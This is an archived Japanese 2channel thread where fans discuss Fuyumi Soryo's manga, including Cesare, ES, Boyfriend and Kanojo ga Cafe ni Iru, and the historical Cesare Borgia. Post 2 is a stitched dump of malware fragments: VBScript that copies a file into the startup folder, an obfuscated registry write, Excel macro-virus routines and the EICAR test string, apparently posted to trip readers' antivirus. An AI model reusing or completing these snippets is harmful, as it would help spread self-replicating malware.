2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ピンクなチェーザレ】惣領冬実【MARSBOY3】

1 :花と名無しさん:2007/01/10(水) 16:19:47 ID:???0
過去スレが落ちてしまい、PART○なのか不明なんですが、
とにかく、また、マターリと語りましょう。

公式
http://www006.upp.so-net.ne.jp/kotama/index2.html

2 :花と名無しさん:2007/01/10(水) 16:24:58 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


3 :花と名無しさん:2007/01/10(水) 21:27:06 ID:???0
前スレ落ちちゃってたんですね。
探しても見つからないと思った・・・。

4 :花と名無しさん:2007/01/11(木) 01:34:00 ID:???O
クセのある絵で、昔はこの人の漫画読めなかった。
最近読んだら、ボーイフレンドとか感動した。
なんかわからんが、あの時代の漫画って全体的に妙な説得力というか魅力があるね。
今の時代は退化してる気がする…

5 :花と名無しさん:2007/01/11(木) 01:51:30 ID:sYH9dk6OO
タイトルいいね

6 :花と名無しさん:2007/01/11(木) 01:59:34 ID:???0
たぶんこれがニスレ目だと思う。

惣領さん画集は出してないよね?激しく希望する。
MARS時代の零は完全補完でよろ

7 :花と名無しさん:2007/01/11(木) 02:02:27 ID:???0
前スレ3年ぐらいもってたのに落ちたのかよwww

8 :花と名無しさん:2007/01/11(木) 02:19:22 ID:HOsGBU39O
ESのシュロが好き

9 :花と名無しさん:2007/01/11(木) 08:44:55 ID:???0
>>6
ボーイフレンドとかの画集は出してたみたいだよ。
欲しいなぁ、でもこのころの絵はあまり・・・という感じですね。

10 :花と名無しさん:2007/01/12(金) 04:33:38 ID:bL45d9F/O
チェーザレって普通に本屋さんに売ってますか?
見当たらないんですが・・

11 :花と名無しさん:2007/01/12(金) 04:37:44 ID:???0
チェーザレの話の進み具合が亀のようにノロイんだけど、
枢機卿から還俗する前に終わるつもりだろうか。
チェーザレ前夜という感じで。

12 :花と名無しさん:2007/01/12(金) 04:50:15 ID:???0
>10
売ってるよ

あれ? 漫画板のチェーザレスレも落ちた?

13 :花と名無しさん:2007/01/12(金) 05:23:05 ID:bL45d9F/O
>>12
本当ですか!?
どこ探してもなくて(@_@;)
すごく欲しいのに。

14 :花と名無しさん:2007/01/12(金) 06:14:39 ID:???0
少女雑誌にいたほうが安泰だったんじゃないのこの人・・・

15 :花と名無しさん:2007/01/12(金) 06:27:35 ID:???O
少女雑誌やめてからは、先生人気ないの?

16 :花と名無しさん:2007/01/12(金) 09:29:14 ID:???0
>>13
ネットで買えば?アマゾンとか、定価より安いし。
本屋なら、店員に聞くべきかと。恥ずかしいジャンルって訳でもないし。

17 :花と名無しさん:2007/01/12(金) 12:49:32 ID:???0
私が学生の時、この人の漫画で1番好きだったのは
「3THREE」だった。
画集みたいなのも買ったよ。
懐かしいな〜

18 :花と名無しさん:2007/01/12(金) 19:00:19 ID:???0
チェーザレは2巻までだよね?

3巻はいつだろう・・・・・・・

19 :花と名無しさん:2007/01/12(金) 19:09:59 ID:???0
4月だね。待ち遠しいわ。

20 :花と名無しさん:2007/01/12(金) 19:56:58 ID:bL45d9F/O
注文しました。

21 :花と名無しさん:2007/01/12(金) 21:27:53 ID:AA7YV4250
>>13
今目立ってる本だとドラゴン桜、バガボンド、働きマンの近くにあるはず
>>15
ESは獣王星的というかなんというか
女性漫画家の描く超能力者物の匂いが漂っていて
それだけでちょっと敬遠されてた感がある
もったいないことに

チェーザレは歴史物だけど主人公の知名度がそこまで高くないのと
モーニングで、しかも不定期連載なのが致命的
柳沢教授や不思議な少年、俺ハエなら一話だけでもいけるけど
チェーザレは1話だけ読んでも興味持ちにくいよ・・・

22 :花と名無しさん:2007/01/12(金) 21:31:39 ID:???0
漫画板新スレたちました

【惣領冬美】チェーザレ 2【もう一人のカエサル】
http://comic7.2ch.net/test/read.cgi/comic/1168578408/


23 :花と名無しさん:2007/01/12(金) 21:47:14 ID:???0
>>21
モーニングで無理に連載するよりかは、アフタヌーンに移った方がいいかも。
ヴィンランド・サガやヒストリエが連載してるから、歴史物でも違和感無いし、
今だったら、おお振り効果で女性読者もそこそこいるだろうし。

24 :花と名無しさん:2007/01/12(金) 21:58:26 ID:???0
アフタは自然消滅することがあるからちょっと怖いな。

25 :花と名無しさん:2007/01/12(金) 23:44:42 ID:???0
時代考証に時間がかかるのはわかるんだけど……やっぱり早く読みたいよね

アフタだとその辺が厳しいかも?
アフタに行ったとしても、1回あたりのページ数は変わらないような予感。
モーニングは隔週連載とか土イチとか、いきなり休載とか不定期連載も受け入れてるから

26 :花と名無しさん:2007/01/14(日) 16:57:56 ID:???0
HPアップされてたよ。
一月で2回目なんて嬉しいage

16億・・・お金持ちなのは羨ましいけど、実際突然そんなにもらっても、
遣いきれないんだろうな庶民には。


27 :花と名無しさん:2007/01/14(日) 17:56:36 ID:???0
何十億もの大金は多分戦争に使っちゃったんだと思われる。
いくらあっても足りなかったんだろうな。
あと枢機卿になる時も、大金をばらまいて黙らしたという話。
(私生児だから、異例の出世にはお金が必要)

28 :花と名無しさん:2007/01/14(日) 19:08:59 ID:???0
個人の所得というより自治体の収入と考える方がいいだろうな。
ルネサンス期でダ・ヴィンチのパトロンだったし、文化方面でも結構な金額になりそう。

29 :花と名無しさん:2007/01/14(日) 21:10:55 ID:???0
>>27,28
すみません…無知で。ひたすら恥ずかしい…。

30 :花と名無しさん:2007/01/15(月) 00:41:30 ID:???O
チェーザレ、読みました。あいかわらず先生絵がうまいですね。すごい!!

31 :花と名無しさん:2007/01/16(火) 00:03:50 ID:???0
チェーザレのスペイン団ナンバー2って誰ですか?
ナンバー1チェーザレ、ナンバー3ミケロットしか出てきませんよね



32 :花と名無しさん:2007/01/16(火) 04:16:52 ID:???O
チェーザレは、漫画の設定というわけではなくて本当にイケメンだったんですか??

33 :花と名無しさん:2007/01/16(火) 08:17:20 ID:???O
一応そうらしいけど。
でも美形という以上に独特の雰囲気のある人だったんだろーな。

34 :花と名無しさん:2007/01/16(火) 11:07:19 ID:???0
>>32
肖像画見る限りキリストぽい風貌だね。
わざとキリストぽく描かせてイメージをダブらせたという話だけど。

35 :花と名無しさん:2007/01/17(水) 14:54:18 ID:???O
宿敵のユリウス二世が即位した時に、ボルジアに関わる肖像画などを徹底的に処分させたらしく、
現存している肖像画は本来のチェーザレの姿とはあんまり似ていないらしい…ってホムペに書いてあったような

36 :花と名無しさん:2007/01/17(水) 15:58:44 ID:???0
AAスレッドに惣領冬実作品の登場人物があった。美しい!
http://aa6.2ch.net/test/read.cgi/kao/1083512694/374-376

37 :花と名無しさん:2007/01/17(水) 18:53:30 ID:???0
>>36
すごーい。
ああいうの作ったことないから、感動。意外に似るもんだね。

38 :花と名無しさん:2007/01/18(木) 12:11:44 ID:???0
>>36
ほんとに凄いね!!
模写するだけでも難しいのに、AAに出来る人、尊敬するわ〜。
ほかのAAも全部見たが、パタリロと月影せんせにワロタww

39 :花と名無しさん:2007/01/21(日) 13:00:15 ID:???0
最近、「彼女がカフェにいる」を買いました。
未読ですが、みなさんの感想などを聞きたいです。

40 :花と名無しさん:2007/01/21(日) 13:38:16 ID:???O
「彼女がカフェ〜」は私が惣領冬実ファンになったきっかけです!
すごく感動するとか面白いってわくではないけど、雰囲気が好きです
すれ違う想いにヤキモキさせられますよ

41 :花と名無しさん:2007/01/21(日) 13:41:15 ID:???0
買ったならさっさと読めよw

42 :花と名無しさん:2007/01/21(日) 14:15:44 ID:???0
>>39
それ読んだら、
「天然の娘さん」も買いなさい。

43 :花と名無しさん:2007/01/21(日) 17:06:34 ID:???O
ES読みました。
惣領さんの作品の主役の男の子ってどーしてこんなにかっこいいんだろう…。
と読みおわったあと30分くらいボーっとしてましたw


44 :花と名無しさん:2007/01/21(日) 20:13:11 ID:???0
>>41
時間がないんだもん(`ε ′)
でも2ch見る時間はある…

45 :花と名無しさん:2007/01/21(日) 21:13:21 ID:???O
>>43
確かにかっこいいよね。

46 :花と名無しさん:2007/01/22(月) 03:17:13 ID:???0
カフェは少女漫画というよりゴールデンタイムのドラマに近いストーリー、構成だと思う。
っていうか漫画原作がガンガンドラマになっている今、月9にピッタリなんでは…

47 :花と名無しさん:2007/01/24(水) 00:35:27 ID:???0
 カフェのドラマ…見てみたいけど、
あの雰囲気を演じられる高校生くらいの役者がいるかなぁ?


48 :花と名無しさん:2007/01/24(水) 01:25:58 ID:???0
んんんー、美人でもブスでもなくごく平凡且つ
温かい家庭のオカンっぽさも合わせ持ち少なくとも見た目十代に見える女優か…
確かにむずいね

49 :花と名無しさん:2007/01/24(水) 09:41:42 ID:???0
風林火山の貫地谷しほりとか思い浮かんだ。

50 :花と名無しさん:2007/01/25(木) 02:45:24 ID:???O
ボーイフレンドも実写映画化してもいけそーじゃない?
純愛だし映像化しやすそう

11 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)